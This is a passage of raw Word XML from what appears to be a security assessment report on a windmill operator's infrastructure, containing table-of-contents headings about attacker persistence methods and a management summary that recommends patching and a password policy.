              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D0CA835" w14:textId="747767EE"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16" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Persistance Methods used by the attacker</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794116 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="699E06B7" w14:textId="22D5DACE" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794117" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Modified nano binary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794117 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E749848" w14:textId="570DB938" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794118" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Modified anew binary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794118 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A030163" w14:textId="1E432DB8" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794119" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Modified fsudo binary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794119 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3058F6ED" w14:textId="60D6A14E" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794120" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>“creanme” binary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794120 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6005B245" w14:textId="35E083BE" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794121" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Erase of evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794121 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5594E88B" w14:textId="645AEBFA" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794122" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794122 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CA9F06A" w14:textId="34CFBC4A"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23" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding Severity Ratings</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794123 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E78FD22" w14:textId="18058688"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24" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Used tools</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794124 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7293C708" w14:textId="495B0AAE" w:rsidR="00D678A8" w:rsidRDefault="00D678A8">
          <w:pPr>
            <w:pStyle w:val="Verzeichnis2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc119794125" w:history="1">
            <w:r w:rsidRPr="00021467">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Disclaimer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc119794125 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50CCED6E" w14:textId="2A477B43" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77">
          <w:pPr>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="002355AE">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="4AF97BEA" w14:textId="2ABDDCD0" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="17CD1BC9" w14:textId="5C81B635" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD60FD9" w14:textId="3159A99C" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="00E50B77">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc119794104"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Management Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="1895B4FA" w14:textId="7E01DC61" w:rsidR="00E50B77" w:rsidRPr="002355AE" w:rsidRDefault="00D75BA5" w:rsidP="00D75BA5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">FZT has been commissioned by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VeSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NP to provide a security audit/assessment of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VeSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NP deployed windmill infrastructure with a remote network-based security assessment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2EA538" w14:textId="69690B9E" w:rsidR="00D75BA5" w:rsidRPr="002355AE" w:rsidRDefault="00D75BA5" w:rsidP="00D75BA5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal of such </w:t>
      </w:r>
      <w:r w:rsidR="006051D3" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002355AE" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is to identify vulnerabilities that an attacker can exploit to compromise </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>systems</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or the data stored on them, to gain access to sensitive information, or to compromise their availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C480DF3" w14:textId="64952BF7" w:rsidR="00D75BA5" w:rsidRPr="002355AE" w:rsidRDefault="00D75BA5" w:rsidP="00D75BA5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Examination result </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBB25E9" w14:textId="415895EA" w:rsidR="00D75BA5" w:rsidRPr="002355AE" w:rsidRDefault="00D75BA5" w:rsidP="00D75BA5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As part of the security </w:t>
      </w:r>
      <w:r w:rsidR="002355AE" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>assessment</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a critical vulnerability which can be exploited by an anonymous Internet attacker with minimal effort to compromise the confidentiality, availability and integrity of the system and its data was identified. In </w:t>
      </w:r>
      <w:r w:rsidR="002355AE" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>addition,</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities have been identified that may be helpful for an attacker </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> gain further access to the whole infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F937AF" w14:textId="77777777" w:rsidR="00D75BA5" w:rsidRPr="002355AE" w:rsidRDefault="00D75BA5" w:rsidP="00D75BA5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The most urgent needed measures are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F2B3FD" w14:textId="349EED56" w:rsidR="00D75BA5" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="00D75BA5">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Apply the suggested fixes to the vulnerable applications, in case this is not possible temporarily remove the remote access to the systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5003CD50" w14:textId="6D41D1AA" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="00D75BA5">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement a password policy and the use of a password manager for passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11155BE0" w14:textId="1BFFDDC7" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To operate the systems with the highest possible degree of safety FZT recommends the implementation of all measures documented in </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref119792875 \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F724D7" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Security Audit Findings</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and continue to carry out a regular safety-related checks to the entire infrastructure of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VeSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E65231" w14:textId="77777777" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
